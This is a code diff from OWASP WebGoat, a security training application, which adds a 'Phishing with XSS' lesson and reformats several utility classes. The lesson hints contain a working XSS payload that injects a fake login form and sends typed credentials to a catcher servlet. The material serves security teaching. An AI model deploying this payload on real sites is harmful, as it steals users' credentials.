+					 + "&lt;/script&gt;&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+					 + "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
+					 + "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+					 + "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+					 + "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
+		/**
+		 * password<script>function hack(){ alert("Had this been a real
+		 * attack... Your credentials were just stolen.\nUser Name = " +
+		 * document.forms(0).user.value + "\nPassword = " +
+		 * document.forms(0).pass.value); XSSImage=new Image;
+		 * XSSImage.src="http://localhost./WebGoat/catcher?PROPERTY=yes&user="+document.forms(0).user.value +
+		 * "&password=" + document.forms(0).pass.value + "";}</script><form><br>
+		 * <br>
+		 * <HR>
+		 * <H3>This feature requires account login:</H2>
+		 * <br>
+		 * <br>
+		 * Enter Username:<br>
+		 * <input type="text" id="user" name="user"><br>
+		 * Enter Password:<br>
+		 * <input type="password" name = "pass"><br>
+		 * <input type="submit" name="login" value="login" onclick="hack()"></form><br>
+		 * <br>
+		 * <HR>
+		 * <!--
+		 * 
+		 */
+		return hints;
+	}
+
+	/**
+	 * Gets the instructions attribute of the XssSearch object
+	 * 
+	 * @return The instructions value
+	 */
+	public String getInstructions(WebSession s)
+	{
+		String instructions =
+				"This lesson is an example of how a website might support a phishing attack<BR><BR>"
+						+ "Below is an example of a standard search feature.<br>"
+						+ "Using XSS and HTML insertion, your goal is to: <UL>"
+						+ "<LI>Insert html to that requests credentials"
+						+ "<LI>Add javascript to actually collect the credentials"
+						+ "<LI>Post the credentials to http://localhost./WebGoat/catcher?PROPERTY=yes...</UL> "
+						+ "To pass this lesson, the credentials must be posted to the catcher servlet.<BR>";
+
+		return (instructions);
+	}
+
+	private final static Integer DEFAULT_RANKING = new Integer(30);
+
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
+
+	/**
+	 * Gets the category attribute of the FailOpenAuthentication object
+	 * 
+	 * @return The category value
+	 */
+	protected Category getDefaultCategory()
+	{
+		return Category.XSS;
+	}
+
+	/**
+	 * Gets the title attribute of the CluesScreen object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return ("Phishing with XSS");
+	}
 
-    /**
-     *  Gets the title attribute of the CluesScreen object
-     *
-     * @return    The title value
-     */
-    public String getTitle()
-    {
-	return ("Phishing with XSS");
-    }
-    
 }
diff --git a/ webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/admin/UserAdminScreen.java b/ webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/admin/UserAdminScreen.java
index 99d212ae3..273e7a379 100644
--- a/ webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/admin/UserAdminScreen.java	
+++ b/ webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/admin/UserAdminScreen.java	
@@ -41,8 +41,8 @@ import org.owasp.webgoat.session.WebSession;
  * 
  * For details, please see http://code.google.com/p/webgoat/
  *
- * @author     Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
- * @created    October 28, 2003
+ * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created October 28, 2003
  */
 public class UserAdminScreen extends LessonAdapter
 {
diff --git a/ webgoat/main/project/JavaSource/org/owasp/webgoat/session/Course.java b/ webgoat/main/project/JavaSource/org/owasp/webgoat/session/Course.java
index 575ddd6c7..efbc9dc33 100644
--- a/ webgoat/main/project/JavaSource/org/owasp/webgoat/session/Course.java	
+++ b/ webgoat/main/project/JavaSource/org/owasp/webgoat/session/Course.java	
@@ -419,8 +419,8 @@ public class Course
     			}
     			if(absoluteFile.startsWith("/lesson_solutions") && absoluteFile.endsWith(".html") && className.endsWith(fileName))
     			{
-    				System.out.println("DEBUG: setting lesson solution file " + absoluteFile + " for lesson " + lesson.getClass().getName());
-    				System.out.println("fileName: " + fileName + " == className: " + className );
+    				//System.out.println("DEBUG: setting lesson solution file " + absoluteFile + " for lesson " + lesson.getClass().getName());
+    				//System.out.println("fileName: " + fileName + " == className: " + className );
     				lesson.setLessonSolutionFileName(absoluteFile);
     			}
     		}
diff --git a/ webgoat/main/project/JavaSource/org/owasp/webgoat/session/ECSFactory.java b/ webgoat/main/project/JavaSource/org/owasp/webgoat/session/ECSFactory.java
index dd0249001..70484ff1d 100644
--- a/ webgoat/main/project/JavaSource/org/owasp/webgoat/session/ECSFactory.java	
+++ b/ webgoat/main/project/JavaSource/org/owasp/webgoat/session/ECSFactory.java	
@@ -116,6 +116,15 @@ public class ECSFactory
 	return (b);
     }
 
+    public static Element makeButton(String text, String onClickFunction)
+    {
+
+	Input b = (Input)makeButton(text);
+	b.setOnClick(onClickFunction);
+	
+	return (b);
+    }
+
 
     /**
      *  Description of the Method
diff --git a/ webgoat/main/project/JavaSource/org/owasp/webgoat/session/ParameterParser.java b/ webgoat/main/project/JavaSource/org/owasp/webgoat/session/ParameterParser.java
index 25321089e..abb3f6bf6 100644
--- a/ webgoat/main/project/JavaSource/org/owasp/webgoat/session/ParameterParser.java	
+++ b/ webgoat/main/project/JavaSource/org/owasp/webgoat/session/ParameterParser.java	
@@ -37,1060 +37,1049 @@ import org.owasp.webgoat.util.HtmlEncoder;
  * for free software projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
+ * 
  * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
  */
 public class ParameterParser
 {
 
-    private final static String ALLOWED_CHARACTERS = "$()-?.@!,:;=//+"; // Don't allow #& specifically
+	private final static String ALLOWED_CHARACTERS = "$()-?.@!,:;=//+"; // Don't
+																		// allow
+																		// #&
+																		// specifically
 
-    private ServletRequest request;
+	private ServletRequest request;
 
-
-    /**
-     *  Constructs a new ParameterParser to handle the parameters of the given
-     *  request.
-     *
-     *@param  request  the servlet request
-     */
-    public ParameterParser(ServletRequest request)
-    {
-	this.request = request;
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     *@param  s  Description of the Parameter
-     *@return    Description of the Return Value
-     */
-    private String clean(String s)
-    {
-	StringBuffer clean = new StringBuffer();
-
-	for (int loop = 0; loop < s.length(); loop++)
+	/**
+	 * Constructs a new ParameterParser to handle the parameters of the given
+	 * request.
+	 * 
+	 * @param request
+	 *            the servlet request
+	 */
+	public ParameterParser(ServletRequest request)
 	{
-	    char c = s.charAt(loop);
-
-	    if (Character.isLetterOrDigit(c) || Character.isWhitespace(c)
-		    || (ALLOWED_CHARACTERS.indexOf(c) != -1))
-	    {
-		clean.append(c);
-	    }
-	    else
-	    {
-		clean.append('.');
-	    }
+		this.request = request;
 	}
 
-	return (clean.toString());
-    }
-
-
-    /**
-     *  Gets the named parameter value as a boolean
-     *
-     *@param  name                            the parameter name
-     *@return                                 the parameter value as a boolean
-     *@exception  ParameterNotFoundException  if the parameter was not found
-     */
-    public boolean getBooleanParameter(String name)
-	    throws ParameterNotFoundException
-    {
-	return new Boolean(getStringParameter(name)).booleanValue();
-    }
-
-
-    /**
-     *  Gets the named parameter value as a boolean, with a default. Returns the
-     *  default value if the parameter is not found.
-     *
-     *@param  name  the parameter name
-     *@param  def   the default parameter value
-     *@return       the parameter value as a boolean, or the default
-     */
-    public boolean getBooleanParameter(String name, boolean def)
-    {
-	try
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	private String clean(String s)
 	{
-	    return getBooleanParameter(name);
-	}
-	catch (Exception e)
-	{
-	    return def;
-	}
-    }
+		StringBuffer clean = new StringBuffer();
 
-
-    /**
-     *  Gets the booleanSubParameter attribute of the ParameterParser object
-     *
-     *@param  first  Description of the Parameter
-     *@param  next   Description of the Parameter
-     *@param  def    Description of the Parameter
-     *@return        The booleanSubParameter value
-     */
-    public boolean getBooleanSubParameter(String first, String next, boolean def)
-    {
-	try
-	{
-	    return new Boolean(getSubParameter(first, next)).booleanValue();
-	}
-	catch (Exception e)
-	{
-	    return def;
-	}
-    }
-
-
-    /**
-     *  Gets the named parameter value as a byte
-     *
-     *@param  name                            the parameter name
-     *@return                                 the parameter value as a byte
-     *@exception  ParameterNotFoundException  if the parameter was not found
-     *@exception  NumberFormatException       if the parameter value could not be
-     *      converted to a byte
-     */
-    public byte getByteParameter(String name)
-	    throws ParameterNotFoundException, NumberFormatException
-    {
-	return Byte.parseByte(getStringParameter(name));
-    }
-
-
-    /**
-     *  Gets the named parameter value as a byte, with a default. Returns the
-     *  default value if the parameter is not found or cannot be converted to a
-     *  byte.
-     *
-     *@param  name  the parameter name
-     *@param  def   the default parameter value
-     *@return       the parameter value as a byte, or the default
-     */
-    public byte getByteParameter(String name, byte def)
-    {
-	try
-	{
-	    return getByteParameter(name);
-	}
-	catch (Exception e)
-	{
-	    return def;
-	}
-    }
-
-
-    /**
-     *  Gets the named parameter value as a char
-     *
-     *@param  name                            the parameter name
-     *@return                                 the parameter value as a char
-     *@exception  ParameterNotFoundException  if the parameter was not found or was
-     *      the empty string
-     */
-    public char getCharParameter(String name) throws ParameterNotFoundException
-    {
-	String param = getStringParameter(name);
-
-	if (param.length() == 0)
-	{
-	    throw new ParameterNotFoundException(name + " is empty string");
-	}
-	else
-	{
-	    return (param.charAt(0));
-	}
-    }
-
-
-    /**
-     *  Gets the named parameter value as a char, with a default. Returns the
-     *  default value if the parameter is not found.
-     *
-     *@param  name  the parameter name
-     *@param  def   the default parameter value
-     *@return       the parameter value as a char, or the default
-     */
-    public char getCharParameter(String name, char def)
-    {
-	try
-	{
-	    return getCharParameter(name);
-	}
-	catch (Exception e)
-	{
-	    return def;
-	}
-    }
-
-
-    /**
-     *  Gets the classNameParameter attribute of the ParameterParser object
-     *
-     *@param  name  Description of the Parameter
-     *@return       The classNameParameter value
-     */
-    public String getClassNameParameter(String name)
-	    throws ParameterNotFoundException
-    {
-	String p = getStringParameter(name);
-	StringTokenizer st = new StringTokenizer(p);
-
-	return (st.nextToken().trim());
-    }
-
-
-    // FIXME: check for [a-zA-Z].([a-zA-Z])*
-
-    /**
-     *  Gets the classNameParameter attribute of the ParameterParser object
-     *
-     *@param  name  Description of the Parameter
-     *@param  def   Description of the Parameter
-     *@return       The classNameParameter value
-     */
-    public String getClassNameParameter(String name, String def)
-    {
-	try
-	{
-	    return getClassNameParameter(name);
-	}
-	catch (Exception e)
-	{
-	    return def;
-	}
-    }
-
-
-    /**
-     *  Gets the named parameter value as a double
-     *
-     *@param  name                            the parameter name
-     *@return                                 the parameter value as a double
-     *@exception  ParameterNotFoundException  if the parameter was not found
-     *@exception  NumberFormatException       if the parameter could not be
-     *      converted to a double
-     */
-    public double getDoubleParameter(String name)
-	    throws ParameterNotFoundException, NumberFormatException
-    {
-	return new Double(getStringParameter(name)).doubleValue();
-    }
-
-
-    /**
-     *  Gets the named parameter value as a double, with a default. Returns the
-     *  default value if the parameter is not found.
-     *
-     *@param  name  the parameter name
-     *@param  def   the default parameter value
-     *@return       the parameter value as a double, or the default
-     */
-    public double getDoubleParameter(String name, double def)
-    {
-	try
-	{
-	    return getDoubleParameter(name);
-	}
-	catch (Exception e)
-	{
-	    return def;
-	}
-    }
-
-
-    /**
-     *  Gets the named parameter value as a float
-     *
-     *@param  name                            the parameter name
-     *@return                                 the parameter value as a float
-     *@exception  ParameterNotFoundException  if the parameter was not found
-     *@exception  NumberFormatException       if the parameter could not be
-     *      converted to a float
-     */
-    public float getFloatParameter(String name)
-	    throws ParameterNotFoundException, NumberFormatException
-    {
-	return new Float(getStringParameter(name)).floatValue();
-    }
-
-
-    /**
-     *  Gets the named parameter value as a float, with a default. Returns the
-     *  default value if the parameter is not found.
-     *
-     *@param  name  the parameter name
-     *@param  def   the default parameter value
-     *@return       the parameter value as a float, or the default
-     */
-    public float getFloatParameter(String name, float def)
-    {
-	try
-	{
-	    return getFloatParameter(name);
-	}
-	catch (Exception e)
-	{
-	    return def;
-	}
-    }
-
-
-    /**
-     *  Gets the named parameter value as an IP String, with a default. Returns the
-     *  default value if the parameter is not found or is the empty string.
-     *
-     *@param  name  the parameter name
-     *@param  def   the default parameter value
-     *@return       the parameter value as a String, or the default
-     */
-    public String getIPParameter(String name, String def)
-    {
-	try
-	{
-	    return getIPParameter(name);
-	}
-	catch (Exception e)
-	{
-	    return def;
-	}
-    }
-
-
-    /**
-     *  Gets the named parameter value as an IP String
-     *
-     *@param  name                            the parameter name
-     *@return                                 the parameter value as a valid IP
-     *      String or an Empty string if invalid
-     *@exception  ParameterNotFoundException  if the parameter was not found or was
-     *      the empty string
-     */
-    public String getIPParameter(String name) throws ParameterNotFoundException
-    {
-	boolean valid = true;
-	String[] values = request.getParameterValues(name);
-	String value;
-
-	if (values == null)
-	{
-	    throw new ParameterNotFoundException(name + " not found");
-	}
-	else if (values[0].length() == 0)
-	{
-	    throw new ParameterNotFoundException(name + " was empty");
-	}
-	else
-	{
-	    // trim illegal characters
-	    value = clean(values[0].trim());
-
-	    if (value.indexOf("&") > 0)
-	    {
-		// truncate additional parameters that follow &
-		value = value.substring(0, value.indexOf("&"));
-	    }
-
-	    // validate the IP  ex: 124.143.12.254
-	    int startIndex = 0;
-	    int endIndex = 0;
-	    int octetCount = 0;
-	    int octetValue;
-	    String octet;
-
-	    // if no .'s then it's not an IP
-	    if (value.indexOf(".") >= 0)
-	    {
-		while ((valid == true) && (octetCount < 4))
+		for (int loop = 0; loop < s.length(); loop++)
 		{
-		    endIndex = value.indexOf(".", startIndex);
+			char c = s.charAt(loop);
 
-		    if (endIndex == -1)
-		    {
-			endIndex = value.length();
-		    }
-
-		    octet = value.substring(startIndex, endIndex);
-		    startIndex = endIndex + 1;
-
-		    try
-		    {
-			octetValue = Integer.parseInt(octet);
-
-			if ((octetValue <= 0) || (octetValue >= 256))
+			if (Character.isLetterOrDigit(c) || Character.isWhitespace(c) || (ALLOWED_CHARACTERS.indexOf(c) != -1))
 			{
-			    valid = false;
+				clean.append(c);
+			} else
+			{
+				clean.append('.');
 			}
-		    }
-		    catch (Exception e)
-		    {
-			valid = false;
-		    }
-
-		    octetCount++;
 		}
-	    }
-	    else
-	    {
-		// Not a valid IP
-		valid = false;
-	    }
 
-	    // Check for any extra garbage. If the last octet was a large value
-	    // it would be trapped by the above range check.
-	    if (value.length() != endIndex)
-	    {
-		valid = false;
-	    }
-
-	    return valid ? value : null;
+		return (clean.toString());
 	}
-    }
 
-
-    /**
-     *  Gets the named parameter value as a int
-     *
-     *@param  name                            the parameter name
-     *@return                                 the parameter value as a int
-     *@exception  ParameterNotFoundException  if the parameter was not found
-     *@exception  NumberFormatException       if the parameter could not be
-     *      converted to a int
-     */
-    public int getIntParameter(String name) throws ParameterNotFoundException,
-	    NumberFormatException
-    {
-	return Integer.parseInt(getStringParameter(name));
-    }
-
-
-    /**
-     *  Gets the named parameter value as a int, with a default. Returns the
-     *  default value if the parameter is not found.
-     *
-     *@param  name  the parameter name
-     *@param  def   the default parameter value
-     *@return       the parameter value as a int, or the default
-     */
-    public int getIntParameter(String name, int def)
-    {
-	try
+	/**
+	 * Gets the named parameter value as a boolean
+	 * 
+	 * @param name
+	 *            the parameter name
+	 * @return the parameter value as a boolean
+	 * @exception ParameterNotFoundException
+	 *                if the parameter was not found
+	 */
+	public boolean getBooleanParameter(String name) throws ParameterNotFoundException
 	{
-	    return getIntParameter(name);
+		return new Boolean(getStringParameter(name)).booleanValue();
 	}
-	catch (Exception e)
+
+	/**
+	 * Gets the named parameter value as a boolean, with a default. Returns the
+	 * default value if the parameter is not found.
+	 * 
+	 * @param name
+	 *            the parameter name
+	 * @param def
+	 *            the default parameter value
+	 * @return the parameter value as a boolean, or the default
+	 */
+	public boolean getBooleanParameter(String name, boolean def)
 	{
-	    return def;
+		try
+		{
+			return getBooleanParameter(name);
+		}
+		catch (Exception e)
+		{
+			return def;
+		}
 	}
-    }
 
-
-    /**
-     *  Gets the named parameter value as a long
-     *
-     *@param  name                            the parameter name
-     *@return                                 the parameter value as a long
-     *@exception  ParameterNotFoundException  if the parameter was not found
-     *@exception  NumberFormatException       if the parameter could not be
-     *      converted to a long
-     */
-    public long getLongParameter(String name)
-	    throws ParameterNotFoundException, NumberFormatException
-    {
-	return Long.parseLong(getStringParameter(name));
-    }
-
-
-    /**
-     *  Gets the named parameter value as a long, with a default. Returns the
-     *  default value if the parameter is not found.
-     *
-     *@param  name  the parameter name
-     *@param  def   the default parameter value
-     *@return       the parameter value as a long, or the default
-     */
-    public long getLongParameter(String name, long def)
-    {
-	try
+	/**
+	 * Gets the booleanSubParameter attribute of the ParameterParser object
+	 * 
+	 * @param first
+	 *            Description of the Parameter
+	 * @param next
+	 *            Description of the Parameter
+	 * @param def
+	 *            Description of the Parameter
+	 * @return The booleanSubParameter value
+	 */
+	public boolean getBooleanSubParameter(String first, String next, boolean def)
 	{
-	    return getLongParameter(name);
+		try
+		{
+			return new Boolean(getSubParameter(first, next)).booleanValue();
+		}
+		catch (Exception e)
+		{
+			return def;
+		}
 	}
-	catch (Exception e)
+
+	/**
+	 * Gets the named parameter value as a byte
+	 * 
+	 * @param name
+	 *            the parameter name
+	 * @return the parameter value as a byte
+	 * @exception ParameterNotFoundException
+	 *                if the parameter was not found
+	 * @exception NumberFormatException
+	 *                if the parameter value could not be converted to a byte
+	 */
+	public byte getByteParameter(String name) throws ParameterNotFoundException, NumberFormatException
 	{
-	    return def;
+		return Byte.parseByte(getStringParameter(name));
 	}
-    }
 
-
-    /**
-     *  Determines which of the required parameters were missing from the request.
-     *  Returns null if all the parameters are present.
-     *
-     *@param  requestuired  Description of the Parameter
-     *@return               an array of missing parameters, or null if none are
-     *      missing
-     */
-    public String[] getMissingParameters(String[] requestuired)
-    {
-	Vector<String> missing = new Vector<String>();
-
-	for (int i = 0; i < requestuired.length; i++)
+	/**
+	 * Gets the named parameter value as a byte, with a default. Returns the
+	 * default value if the parameter is not found or cannot be converted to a
+	 * byte.
+	 * 
+	 * @param name
+	 *            the parameter name
+	 * @param def
+	 *            the default parameter value
+	 * @return the parameter value as a byte, or the default
+	 */
+	public byte getByteParameter(String name, byte def)
 	{
-	    String val = getStringParameter(requestuired[i], null);
-
-	    if (val == null)
-	    {
-		missing.addElement(requestuired[i]);
-	    }
+		try
+		{
+			return getByteParameter(name);
+		}
+		catch (Exception e)
+		{
+			return def;
+		}
 	}
 
-	if (missing.size() == 0)
+	/**
+	 * Gets the named parameter value as a char
+	 * 
+	 * @param name
+	 *            the parameter name
+	 * @return the parameter value as a char
+	 * @exception ParameterNotFoundException
+	 *                if the parameter was not found or was the empty string
+	 */
+	public char getCharParameter(String name) throws ParameterNotFoundException
 	{
-	    return null;
+		String param = getStringParameter(name);
+
+		if (param.length() == 0)
+		{
+			throw new ParameterNotFoundException(name + " is empty string");
+		} else
+		{
+			return (param.charAt(0));
+		}
 	}
-	else
+
+	/**
+	 * Gets the named parameter value as a char, with a default. Returns the
+	 * default value if the parameter is not found.
+	 * 
+	 * @param name
+	 *            the parameter name
+	 * @param def
+	 *            the default parameter value
+	 * @return the parameter value as a char, or the default
+	 */
+	public char getCharParameter(String name, char def)
 	{
-	    String[] ret = new String[missing.size()];
-	    missing.copyInto(ret);
-
-	    return ret;
+		try
+		{
+			return getCharParameter(name);
+		}
+		catch (Exception e)
+		{
+			return def;
+		}
 	}
-    }
 
-
-    /**
-     *  Gets the parameterNames attribute of the ParameterParser object
-     *
-     *@return    The parameterNames value
-     */
-    public Enumeration getParameterNames()
-    {
-	if (request == null)
+	/**
+	 * Gets the classNameParameter attribute of the ParameterParser object
+	 * 
+	 * @param name
+	 *            Description of the Parameter
+	 * @return The classNameParameter value
+	 */
+	public String getClassNameParameter(String name) throws ParameterNotFoundException
 	{
-	    return (null);
+		String p = getStringParameter(name);
+		StringTokenizer st = new StringTokenizer(p);
+
+		return (st.nextToken().trim());
 	}
 
-	return request.getParameterNames();
-    }
+	// FIXME: check for [a-zA-Z].([a-zA-Z])*
 
-
-    /**
-     *  Gets the parameterValues attribute of the ParameterParser object
-     *
-     *@param  name  Description of the Parameter
-     *@return       The parameterValues value
-     */
-    public String[] getParameterValues(String name)
-    {
-	if (request == null)
+	/**
+	 * Gets the classNameParameter attribute of the ParameterParser object
+	 * 
+	 * @param name
+	 *            Description of the Parameter
+	 * @param def
+	 *            Description of the Parameter
+	 * @return The classNameParameter value
+	 */
+	public String getClassNameParameter(String name, String def)
 	{
-	    return (null);
+		try
+		{
+			return getClassNameParameter(name);
+		}
+		catch (Exception e)
+		{
+			return def;
+		}
 	}
 
-	return request.getParameterValues(name);
-    }
-
-
-    /**
-     *  Gets the rawParameter attribute of the ParameterParser object
-     *
-     *@param  name  Description of the Parameter
-     *@param  def   Description of the Parameter
-     *@return       The rawParameter value
-     */
-    public String getRawParameter(String name, String def)
-    {
-	try
+	/**
+	 * Gets the named parameter value as a double
+	 * 
+	 * @param name
+	 *            the parameter name
+	 * @return the parameter value as a double
+	 * @exception ParameterNotFoundException
+	 *                if the parameter was not found
+	 * @exception NumberFormatException
+	 *                if the parameter could not be converted to a double
+	 */
+	public double getDoubleParameter(String name) throws ParameterNotFoundException, NumberFormatException
 	{
-	    return getRawParameter(name);
+		return new Double(getStringParameter(name)).doubleValue();
 	}
-	catch (Exception e)
+
+	/**
+	 * Gets the named parameter value as a double, with a default. Returns the
+	 * default value if the parameter is not found.
+	 * 
+	 * @param name
+	 *            the parameter name
+	 * @param def
+	 *            the default parameter value
+	 * @return the parameter value as a double, or the default
+	 */
+	public double getDoubleParameter(String name, double def)
 	{
-	    return def;
+		try
+		{
+			return getDoubleParameter(name);
+		}
+		catch (Exception e)
+		{
+			return def;
+		}
 	}
-    }
 
-
-    /**
-     *  Gets the rawParameter attribute of the ParameterParser object
-     *
-     *@param  name                            Description of the Parameter
-     *@return                                 The rawParameter value
-     *@exception  ParameterNotFoundException  Description of the Exception
-     */
-    public String getRawParameter(String name)
-	    throws ParameterNotFoundException
-    {
-	String[] values = request.getParameterValues(name);
-
-	if (values == null)
+	/**
+	 * Gets the named parameter value as a float
+	 * 
+	 * @param name
+	 *            the parameter name
+	 * @return the parameter value as a float
+	 * @exception ParameterNotFoundException
+	 *                if the parameter was not found
+	 * @exception NumberFormatException
+	 *                if the parameter could not be converted to a float
+	 */
+	public float getFloatParameter(String name) throws ParameterNotFoundException, NumberFormatException
 	{
-	    throw new ParameterNotFoundException(name + " not found");
+		return new Float(getStringParameter(name)).floatValue();
 	}
-	else if (values[0].length() == 0)
+
+	/**
+	 * Gets the named parameter value as a float, with a default. Returns the
+	 * default value if the parameter is not found.
+	 * 
+	 * @param name
+	 *            the parameter name
+	 * @param def
+	 *            the default parameter value
+	 * @return the parameter value as a float, or the default
+	 */
+	public float getFloatParameter(String name, float def)
 	{
-	    throw new ParameterNotFoundException(name + " was empty");
+		try
+		{
+			return getFloatParameter(name);
+		}
+		catch (Exception e)
+		{
+			return def;
+		}
 	}
 
-	return (values[0]);
-    }
-
-
-    /**
-     *  Gets the named parameter value as a short
-     *
-     *@param  name                            the parameter name
-     *@return                                 the parameter value as a short
-     *@exception  ParameterNotFoundException  if the parameter was not found
-     *@exception  NumberFormatException       if the parameter could not be
-     *      converted to a short
-     */
-    public short getShortParameter(String name)
-	    throws ParameterNotFoundException, NumberFormatException
-    {
-	return Short.parseShort(getStringParameter(name));
-    }
-
-
-    /**
-     *  Gets the named parameter value as a short, with a default. Returns the
-     *  default value if the parameter is not found.
-     *
-     *@param  name  the parameter name
-     *@param  def   the default parameter value
-     *@return       the parameter value as a short, or the default
-     */
-    public short getShortParameter(String name, short def)
-    {
-	try
+	/**
+	 * Gets the named parameter value as an IP String, with a default. Returns
+	 * the default value if the parameter is not found or is the empty string.
+	 * 
+	 * @param name
+	 *            the parameter name
+	 * @param def
+	 *            the default parameter value
+	 * @return the parameter value as a String, or the default
+	 */
+	public String getIPParameter(String name, String def)
 	{
-	    return getShortParameter(name);
+		try
+		{
+			return getIPParameter(name);
+		}
+		catch (Exception e)
+		{
+			return def;
+		}
 	}
-	catch (Exception e)
+
+	/**
+	 * Gets the named parameter value as an IP String
+	 * 
+	 * @param name
+	 *            the parameter name
+	 * @return the parameter value as a valid IP String or an Empty string if
+	 *         invalid
+	 * @exception ParameterNotFoundException
+	 *                if the parameter was not found or was the empty string
+	 */
+	public String getIPParameter(String name) throws ParameterNotFoundException
 	{
-	    return def;
+		boolean valid = true;
+		String[] values = request.getParameterValues(name);
+		String value;
+
+		if (values == null)
+		{
+			throw new ParameterNotFoundException(name + " not found");
+		} else if (values[0].length() == 0)
+		{
+			throw new ParameterNotFoundException(name + " was empty");
+		} else
+		{
+			// trim illegal characters
+			value = clean(values[0].trim());
+
+			if (value.indexOf("&") > 0)
+			{
+				// truncate additional parameters that follow &
+				value = value.substring(0, value.indexOf("&"));
+			}
+
+			// validate the IP ex: 124.143.12.254
+			int startIndex = 0;
+			int endIndex = 0;
+			int octetCount = 0;
+			int octetValue;
+			String octet;
+
+			// if no .'s then it's not an IP
+			if (value.indexOf(".") >= 0)
+			{
+				while ((valid == true) && (octetCount < 4))
+				{
+					endIndex = value.indexOf(".", startIndex);
+
+					if (endIndex == -1)
+					{
+						endIndex = value.length();
+					}
+
+					octet = value.substring(startIndex, endIndex);
+					startIndex = endIndex + 1;
+
+					try
+					{
+						octetValue = Integer.parseInt(octet);
+
+						if ((octetValue <= 0) || (octetValue >= 256))
+						{
+							valid = false;
+						}
+					}
+					catch (Exception e)
+					{
+						valid = false;
+					}
+
+					octetCount++;
+				}
+			} else
+			{
+				// Not a valid IP
+				valid = false;
+			}
+
+			// Check for any extra garbage. If the last octet was a large value
+			// it would be trapped by the above range check.
+			if (value.length() != endIndex)
+			{
+				valid = false;
+			}
+
+			return valid ? value : null;
+		}
 	}
-    }
 
-
-    /**
-     *  Gets the named parameter value as a String
-     *
-     *@param  name                            the parameter name
-     *@return                                 the parameter value as a String
-     *@exception  ParameterNotFoundException  if the parameter was not found or was
-     *      the empty string
-     */
-    public String getStringParameter(String name)
-	    throws ParameterNotFoundException
-    {
-	String[] values = request.getParameterValues(name);
-	String value;
-
-	if (values == null)
+	/**
+	 * Gets the named parameter value as a int
+	 * 
+	 * @param name
+	 *            the parameter name
+	 * @return the parameter value as a int
+	 * @exception ParameterNotFoundException
+	 *                if the parameter was not found
+	 * @exception NumberFormatException
+	 *                if the parameter could not be converted to a int
+	 */
+	public int getIntParameter(String name) throws ParameterNotFoundException, NumberFormatException
 	{
-	    throw new ParameterNotFoundException(name + " not found");
+		return Integer.parseInt(getStringParameter(name));
 	}
-	else if (values[0].length() == 0)
+
+	/**
+	 * Gets the named parameter value as a int, with a default. Returns the
+	 * default value if the parameter is not found.
+	 * 
+	 * @param name
+	 *            the parameter name
+	 * @param def
+	 *            the default parameter value
+	 * @return the parameter value as a int, or the default
+	 */
+	public int getIntParameter(String name, int def)
 	{
-	    throw new ParameterNotFoundException(name + " was empty");
+		try
+		{
+			return getIntParameter(name);
+		}
+		catch (Exception e)
+		{
+			return def;
+		}
 	}
-	else
+
+	/**
+	 * Gets the named parameter value as a long
+	 * 
+	 * @param name
+	 *            the parameter name
+	 * @return the parameter value as a long
+	 * @exception ParameterNotFoundException
+	 *                if the parameter was not found
+	 * @exception NumberFormatException
+	 *                if the parameter could not be converted to a long
+	 */
+	public long getLongParameter(String name) throws ParameterNotFoundException, NumberFormatException
 	{
-	    // trim illegal characters
-	    value = clean(values[0].trim());
-
-	    if (value.indexOf("&") > 0)
-	    {
-		// truncate additional parameters that follow &
-		value = value.substring(0, value.indexOf("&"));
-	    }
-
-	    return value;
+		return Long.parseLong(getStringParameter(name));
 	}
-    }
 
-
-    /**
-     *  Gets the named parameter value as a String, with a default. Returns the
-     *  default value if the parameter is not found or is the empty string.
-     *
-     *@param  name  the parameter name
-     *@param  def   the default parameter value
-     *@return       the parameter value as a String, or the default
-     */
-    public String getStringParameter(String name, String def)
-    {
-	try
+	/**
+	 * Gets the named parameter value as a long, with a default. Returns the
+	 * default value if the parameter is not found.
+	 * 
+	 * @param name
+	 *            the parameter name
+	 * @param def
+	 *            the default parameter value
+	 * @return the parameter value as a long, or the default
+	 */
+	public long getLongParameter(String name, long def)
 	{
-	    return getStringParameter(name);
+		try
+		{
+			return getLongParameter(name);
+		}
+		catch (Exception e)
+		{
+			return def;
+		}
 	}
-	catch (Exception e)
+
+	/**
+	 * Determines which of the required parameters were missing from the
+	 * request. Returns null if all the parameters are present.
+	 * 
+	 * @param requestuired
+	 *            Description of the Parameter
+	 * @return an array of missing parameters, or null if none are missing
+	 */
+	public String[] getMissingParameters(String[] requestuired)
 	{
-	    return def;
+		Vector<String> missing = new Vector<String>();
+
+		for (int i = 0; i < requestuired.length; i++)
+		{
+			String val = getStringParameter(requestuired[i], null);
+
+			if (val == null)
+			{
+				missing.addElement(requestuired[i]);
+			}
+		}
+
+		if (missing.size() == 0)
+		{
+			return null;
+		} else
+		{
+			String[] ret = new String[missing.size()];
+			missing.copyInto(ret);
+
+			return ret;
+		}
 	}
-    }
 
-
-    /**
-     *  Gets the subParameter attribute of the ParameterParser object
-     *
-     *@param  first  Description of the Parameter
-     *@param  next   Description of the Parameter
-     *@param  def    Description of the Parameter
-     *@return        The subParameter value
-     */
-    public String getSubParameter(String first, String next, String def)
-    {
-	try
+	/**
+	 * Gets the parameterNames attribute of the ParameterParser object
+	 * 
+	 * @return The parameterNames value
+	 */
+	public Enumeration getParameterNames()
